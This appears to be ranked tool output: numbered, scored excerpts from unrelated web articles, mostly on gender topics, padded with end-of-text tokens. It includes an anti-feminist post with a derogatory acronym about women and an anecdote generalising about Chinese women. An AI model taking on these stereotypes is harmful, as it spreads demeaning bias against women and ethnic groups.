were apparently made secretively, withheld from exhibition at her own instruction for 20 years after her death. + +Af Klint was trained in portrait, landscape, and botanical painting at the Royal Academy of Fine Arts, Stockholm, from 1882 to 1887. From the late 1880s on, however, she rejected these disciplines, joining four other female artists to form the group De Fem (The Five), which conducted weekly séances and engaged with esoteric religious philosophies. + +This side of her work — presented here as the primary side, the academic pieces completely discarded — was thus wholly rooted in spiritual concerns. She used painting as a medium (pun intended) through which the secret language of nature, whether cosmic or earthly, could be manifested, as well as early experimentations with automatic drawing. This may be the crux for understanding why her art has for so long been ignored: The level of finish (or distinct lack thereof) evidenced in the works, combined with a penchant for unplanned, experimental sequences including meandering lines and automatic drawing, indicates that the physical paintings, for af Klint, really were planes on which she communicated with immaterial and spiritual forces. They are far removed from the traditional, Western notion of not only representative art, but also, crucially, anti-representational art. In a way, to mention her work in the same breath as any of the Modernist abstraction movements is misleading, undermining real efforts to understand her real purpose. + +Af Klint’s paintings appear as a series of sequences, in which one visual theme is explored in limited but specific directions +================================================================================ +Rank = 81; Score = 327680.0 +<|begin_of_text|>SWNS / Tony Kershaw + +It took Lily Madigan four years to muster the courage to tell her family, her friends, and her school that she identifies as female. It took another two months for her to arrive at the school gates finally dressed in the uniform that fits with who she is. In March, Madigan, who was in the lower sixth, made her way to St Simon Stock Catholic School – a state-funded academy ­– in Maidstone, Kent, in the blouse that the other girls wear. What happened next was not what she expected. And so, last week, six months after that day, Madigan, 18, contacted BuzzFeed News to reveal what she encountered and what it means to hope for liberation and understanding only to find the opposite. Madigan was nervous that morning as she got ready for school, she said. Her voice is soft; she mostly speaks in short sentences. Despite the nerves, she added, “it just felt right”. And, in any case, “it was a lot easier than wearing a boy’s uniform”. She felt sure the school would accommodate her decision: “I didn’t think it would be a problem; I assumed they would know their obligations.” + +Facebook / Lily Madigan + +Shortly after entering the school premises, Mr Williams, the head of sixth form, saw Madigan. “I was pulled over for my uniform,” she said. He took her to his office. “He said my dress code was incorrect. I said I identify as female, so this is the correct dress code for me.” Boys at the school’s sixth form have to wear a shirt, tie, blazer, and trousers. Girls can wear a skirt or trousers. Williams brought in Madigan’s “pastoral manager” to discuss the situation. St Simon Stock school's website says it “prides itself on the quality of its pastoral delivery”. The conclusion of this discussion was clear: “They said I was breaking the dress code and I had to go home. At that point I was pretty panicky,” Madigan said. This anxiety began to rise; she did not feel able to respond, and anyway, she added, she doesn’t like confrontation. “I just went.” At 14, Madigan realised who she was. “It’s always something I knew subconsciously,” she said, “but when I learned the term [transgender] it just clicked.” She eventually told her mother, over dinner, and then in January this year she told her friends at school. +================================================================================ +Rank = 82; Score = 327680.0 +<|begin_of_text|>Explaining the evolution of cooperation among non-relatives is one of the major challenges for evolutionary biology. In this study, we experimentally examined human cooperation in the iterated Snowdrift game (ISD), which has received little attention so far, and compared it with human cooperation in the iterated Prisoner's Dilemma (IPD), which has become the paradigm for the evolution of cooperation. We show that iteration in the ISD leads to consistently higher levels of cooperation than in the IPD. We further demonstrate that the most successful strategies known for the IPD (generous Tit-for-Tat and Pavlov) were also successfully used in the ISD. Interestingly, we found that female players cooperated significantly more often than male players in the IPD but not in the ISD. Moreover, female players in the IPD applied Tit-for-Tat-like or Pavlovian strategies significantly more often than male players, thereby achieving significantly higher pay-offs than male players did. These data demonstrate that the willingness to cooperate does not only depend on the type of the social dilemma, but also on the class of individuals involved. Altogether, our study shows that the ISD can potentially explain high levels of cooperation among non-relatives in humans. In addition, the ISD seems to reflect the social dilemma more realistically than the IPD because individuals obtain immediate direct benefits from the cooperative acts they perform and costs of cooperation are shared between cooperators.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 83; Score = 325632.0 +<|begin_of_text|>Fetal sex tests have a few medical applications, allowing couples with histories of rare sex-linked disorders to avoid costly and invasive genetic testing if they learn they are expecting the other sex. But for most couples, the tests, which are unregulated, simply answer the boy-or-girl question weeks earlier than ultrasound, and in a less invasive and safer way than amniocentesis. + +“Seven weeks is a different time in pregnancy,” said Dr. James Egan, a professor of obstetrics and gynecology at the University of Connecticut Health Center who was a co-author of a study on sex selection with Dr. Chapman and others. “Women haven’t had the ultrasound where you see the fetus that looks like a baby. Many people don’t even know that a woman is pregnant. And you can have a medical termination,” using pills like RU-486, which can be used at home discreetly before 10 weeks of pregnancy. + +There is evidence that some Americans want to choose their babies’ sex. At the Fertility Institutes, a set of clinics in Los Angeles, New York and Guadalajara, Mexico, 85 percent of roughly 500 couples each year seek sex selection, although three-quarters of them come from overseas, said Dr. Jeffrey Steinberg, the medical director. + +“It’s jumped over the past four years,” said Dr. Steinberg, whose clinics determine sex through pre-implantation genetic diagnosis, an embryo screening that also detects genetic disorders. He said that “if a woman calls to make the appointment, the couple almost always wants a female. If a man calls, they almost always want a male.” + +But clinics and some ethicists say this type of sex selection is more acceptable because it occurs before embryos are implanted, before pregnancy. + +“We’re trying to prevent the abortion,” said Dr. Jamie Grifo, program director for New York University’s Fertility Center. His and other clinics typically allow sex selection for couples with two or more children, parents interested in “family balancing,” adding a child of the opposite sex. + +“For someone who has two girls and wants to have a boy, so each sibling can grow up with brother and sister, what’s wrong with that?” Dr. Grifo said. + +Advertisement Continue reading the main story + +Still, the cost and commitment of the fertility process makes such sex selection cases relatively unusual. Fetal DNA tests, costing between $250 and $350, are more affordable. + +Anti-abortion groups are incorporating sex selection in legislative agendas. Arizona and Oklahoma recently passed laws banning sex-selected abortion +================================================================================ +Rank = 84; Score = 323584.0 +<|begin_of_text|>New Delhi (CNN) — Air India, a debt-burdened, state-run carrier, is trying to shed some extra flab. + +The airline has asked 125 of its flight attendants to lose a few pounds or get ready for an airport job. + +l e v a r t + +"It is an opportunity for them to bring themselves back to the (required) fitness level. If they cannot because of any medical reasons, they will be offered ground duties," Air India spokesman G.P. Rao told CNN Tuesday. + +The decision follows fitness guidelines laid out by India's civil aviation regulator. + +Last year, the regulator mandated a body mass index (BMI) of 18-25 for male cabin crew members and 18-22 for female cabin crew members. Men with a BMI of 25-29.99, and women with a BMI of 22-27, were classified as overweight. + +'Safety issue' + +Some say the index, which is determined by a person's height-to-weight ratio, is not always an accurate indicator of someone's health and body fat percentage. + +But the airline insists the move to manage its employees' physique is not about appearances. + +"It's a safety issue," Rao said. "The crew has to be fit to be able to carry out their inflight duties, including emergencies." + +Rao, however, didn't say how much time the shortlisted 125-odd crew would have to slim down. + +He added this is not the first time Air India has advised its flight attendants to stay "fit." + +l e v a r t + +"This is an ongoing process. We have been doing this exercise for quite some time," he said. + +Air India currently employs more than 3,000 cabin crew members. According to a Times of India report, a "large number" of the employees refused to undergo medical examinations for their BMI as ordered by the company back in 2013. Instead, they asked the airline to first pay for gym memberships before conducting any lab tests, the report said.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 85; Score = 321536.0 +<|begin_of_text|>We’re all getting fatter, but Irish men are getting fatter fastest. The prognosis is poor: by 2030, 58 per cent of Irish men are expected to be obese, topping the scale of all European countries, according to a UK-based study published last year. If you add the projected number of overweight men to the Irish total, the figure is even worse, coming in at a gut-busting 90 per cent. + +Now a new review of men’s food behaviour by Safefood, the all-Ireland health body, shows that we’re well on our way to fulfilling that frightening prediction. It points out that 70 per cent of men in the Republic are currently overweight or obese, compared with 50 per cent of women, as are 69 per cent of men in the North, against 57 per cent of women. + +The big question, of course, is why. What is it about living on this island that makes Irish men, in particular, stuff themselves silly, with so little regard for the health consequences? + +Many reasons – from simple greed or laziness, to more complex speculations about how men respond to stress, or marriage, or whether they are especially sensitive to the effects of chemicals such as phthalates, commonly found in household products – have been forwarded for male weight gain. + +Dr Aileen McGloin, from Safefood, has a list of contributing factors as long as your arm, all of which, it seems, can be summed up by one single sentence. “Men,” she says, “live in a different food world.” + +A different food world? Hang on, don’t we all occupy the same universe of choices, populated by temptations like fat-laden ready-meals and sneaky snacks under the desk at work? But McGloin says that men’s experience of eating, and all that goes with it – the shopping, the preparation, the amount they actually consume – is often markedly different to how women encounter their food. + +Men are more likely to eat larger portions, they’re less likely to be aware of healthy eating guidelines, and many don’t regard eating well as an important factor in their long-term health. + +Is it just about complacency then? Even ignorance? McGloin isn’t keen to be so judgmental. Rather, she says, it’s a matter of cultural conditioning, right from the start. + +“You have to be careful about over-generalising, but men are less likely to learn about food in childhood, so they sometimes come into adulthood without +================================================================================ +Rank = 86; Score = 321536.0 +<|begin_of_text|>A Haines teenager was likely the first transgender student to compete at a statewide high school athletic competition. Nattaphon Wangyot was born male, but has identified as female since she was about five years old. Her participation in last weekend’s track meet in Anchorage drew a lot of attention, both positive and negative. + +Download Audio + +Wangyot goes by the nickname ‘Ice.’ Her mother, Tukta Panyawong, said the nickname comes from when she was pregnant with Ice, back in Thailand, and she used to chew on ice cubes. + +Panyawong said the nickname fits, especially in the aftermath of the track meet. She says her daughter has been cool under pressure. + +“You know, if some people say bad to you and you do bad to them, it’s not going to end easy,” Ice said. “So if they say bad to you, just smile at them and let it go.” + +There’s a lot Ice has to let go. She’s read comments from news stories about the track competition. Some are supportive and positive, but Ice says others are ‘hateful.’ But, she says, the hateful comments make her stronger. + +“Some hateful people make me stronger and stronger,” Ice said. “So I want to say ‘thank you’ for everybody.” + +It isn’t just online commentators who have a problem with Ice competing against other girls. On Friday, the conservative Christian group Alaska Family Action held a press conference. + +“It is not fair and it is not right for our female athletes, and we have a responsibility to protect our girls,” said Stephanie Leigh Golmon Williams, as reported by KTVA. + +The group said male-to-female transgender students have an advantage over biologically female athletes. Ice disagrees. She says she takes medication that suppresses male hormones and increases female hormones. + +Alaska Family Action was protesting the Alaska School Activities Association’s recently adopted policy on transgender athletes. The policy lets local schools decide whether transgender students can compete according to the gender they identify with. + +“The bigger gist of how this policy was developed is ASAA feels that schools are in the best position of dealing with individual students and know which individual students consistently identify with a different gender and can apply that better than we can, thousands of miles away from the actual student,” said ASAA director Billy Strickland. + +“Yeah, we’re not gonna discriminate based on gender identity. That’s the just the long and the short of it,” said Haines School District Interim Superintendent Rich Carlson. + +Ice moved to H +================================================================================ +Rank = 87; Score = 321536.0 +<|begin_of_text|>When black teachers and white teachers are asked to sum up black high school students' potential, white teachers are much less likely to see black students as college material. And that's true even when they're discussing the same students. + +A new study exploring how race influences teachers' perception of their students' abilities found that those expectations are racially biased. + +When teachers are asked about their expectations for black students, nonblack teachers were 30 percent less likely than black teachers to say they thought those students would earn a college degree. + +The implications are troubling, in part because the majority of public school students in the US are nonwhite but the majority of teachers are not. + +How racial bias influences teachers' expectations + +On average, black students have lower test scores than white students, they attend schools with fewer resources, and they are less likely to graduate from high school and college. Assuming that will continue to be the case is what President George W. Bush called "the soft bigotry of low expectations." + +But Bush was usually talking about collective expectations. The researchers in the new study, published as a working paper by the Upjohn Institute, which specializes in employment research, didn't compare teachers' broad expectations for their black students with their expectations of white students. It looked at how teachers of different races perceived the potential of the same student — where race, theoretically, shouldn't make as much of a difference. + +In 2002, as part of a study that followed high school sophomores through the educational system, the Education Department asked those students' math and reading teachers if they expected them to eventually earn a high school or college degree. + +The researchers, Seth Gershenson, Stephen B. Holt, and Nicholas Papageorge, looked at how those expectations differed based on whether the teachers were the same race or sex as their student, using a data set of about 16,000 students. They found that teachers' expectations for their white students didn't differ based on the teachers' race, but that black teachers' expectations were significantly higher for their black students than white teachers' expectations were. + +The differences were even larger when the teachers were of both a different sex and race than their students — particularly for white female teachers evaluating black male students. + +"We cannot determine whether the black teachers are too optimistic, the non-black teachers are too pessimistic, or some combination of the two," Gershenson wrote in a blog post at the Brookings Institution. "This is nonetheless concerning, as teachers’ expectations likely shape student outcomes." + +The "Pygmalion effect": Teachers +================================================================================ +Rank = 88; Score = 319488.0 +<|begin_of_text|>I am not completely sure about this but I would like to share my opinion. Through my travels to this wonderful nation, I had the opportunity to visit cities like Xian, Tianjin, Beijing, Shenzhen, Suzhou, Shanghai and Harbin. + +A common observation that stood out in these visits was that the Chinese women were generally more interested and engaged in continuing a conversation. The young women also seemed to show interest in knowing more about my background, where I was from and what made me come to China. It was probably because it was rare for them to see an Indian national in cities like Xian and Tianjin. + +Also, I noticed that most occupations which involved speaking and other customer service related jobs were primarily held by women. Every local restaurant I visited, the orders were always taken by the women while the men were involved with the cleaning, setting up tables and other tasks. + +Based on these experiences, I feel Chinese women are culturally more outgoing and more comfortable with speaking to people from different backgrounds. Additionally, during my graduate study at Northwestern, all the male students from Mainland China were much more reserved than the female graduate students. + +There were would be several other dynamics and factors involved, but I agree with the question and feel it might be easier for women from Mainland China to adapt quicker. This might vary between individuals and may not be true for older Chinese people (the dynamics may be reversed for higher age groups).<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 89; Score = 319488.0 +<|begin_of_text|>The Man from NEVER* scowling at a howling mob of feminists. There are comic strips to accompany some of these that I will get posted in the coming weeks. * NEVER: Network to Eliminate Vaginally Elitist Rabble. Slogan: It's NOW or NEVER! In the 1990s feminist marches focused almost exclusively on male violence against women (while utterlying ignoring female violence against men and children and elders and other women). As the number of studies have increased that show male violence against women is not nearly as bad a problem as the feminists would have us believe, and that female violence is far more prevalent than they would have us believe, their protests have shifted emphasis to blame the "slut shaming" women do to one another on men, and to basically protest everything with naked displays that amuse and entertain most men but irritate and anger most women. Regards, Rod Van Mechelen Rod Van Mechelen is the author of What Everyone Should Know about Feminist Issues: The Male-Positive Perspective (the page now includes several articles by other authors), and the publisher of The Backlash! @ Backlash.com and Cowlitz Country News. He is a member of the Cowlitz Indian Tribe and served for 9-1/2 years on the Cowlitz Indian Tribal Council.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 90; Score = 319488.0 +<|begin_of_text|>There’s an enduring popular image of divorced women as bitter and jaded, while divorced men are portrayed as all too happy to break free. But this proves wrong when put to the test. + +Women love four things, according to hack comedians and romantic comedies: chocolate, shopping, nagging dudes like it’s their job, and marriage. On that last count, we’re told, love rises to the level of obsession: Women long to be brides their whole lives and then cling to their marriages when they become wives. But new studies suggest women are less happy in mediocre heterosexual marriages, more likely to call things off and more content with post-divorce life than men. Taken together, the findings debunk a lot of long-held—and outdated—gendered ideas about one of our oldest institutions. + +Women and men are equally likely to end non-married intimate relationships, including when the couple lives together. That all changes once vows are exchanged. A 2015 study involving more than 2,000 heterosexual married couples aged 19 to 94 found that women initiate divorce in nearly 70 percent of marriages. Researchers theorize this might be a result of gender norms that make heterosexual marriage an unequal partnership, with women getting the short end of the stick. We know that married couples divide housework evenly until they have a child, after which the woman takes on the bulk of childcare and housework loads shift disproportionately to her. + +Marriage does a better job for men of improving health outcomes, decreasing chronic illnesses, and extending life spans, than it does for women. Married men make more money than their unmarried male counterparts, but there’s no such income bump for married women. In fact, researchers note that post-marriage, women’s “earnings and careers are thought to suffer.” This might contribute to the reasons why, as study author Michael Rosenfeld of Stanford University told Science Daily, “Women seem to have a predominant role in initiating divorces in the U.S. as far back as there is data from a variety of sources, back to the 1940s.” + +“I think that marriage as an institution has been a little bit slow to catch up with expectations for gender equality,” Rosenfeld added. “Wives still take their husbands’ surnames, and are sometimes pressured to do so. Husbands still expect their wives to do the bulk of the housework and the bulk of the childcare. On the other hand, I think that non-marital relationships lack the historical baggage and expectations of marriage, which makes the non-marital +================================================================================ +Rank = 91; Score = 313344.0 +<|begin_of_text|>Most Democrats want stricter gun laws, and most Republicans oppose them. So you might expect the election of Donald Trump and a Republican-controlled Congress to be great news for the nation’s gunmakers. But surprisingly, the opposite turned out to be the case. + +Two of the nation’s biggest gun manufacturers, Smith & Wesson and Sturm Ruger, saw their stock prices fall by double digits this morning in the wake of Trump’s election victory. + +Here’s one theory for what’s going on: In recent years, gun sales have been driven by fears of gun confiscations. Gun sales soared after Obama’s election in 2008 and again when he was reelected in 2012, as people worried that the president would begin to confiscate the nation’s firearms. + +In contrast, gun owners have little to fear from a Trump presidency or a Republican Congress. So gunmakers are likely to make fewer sales over the next four years.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_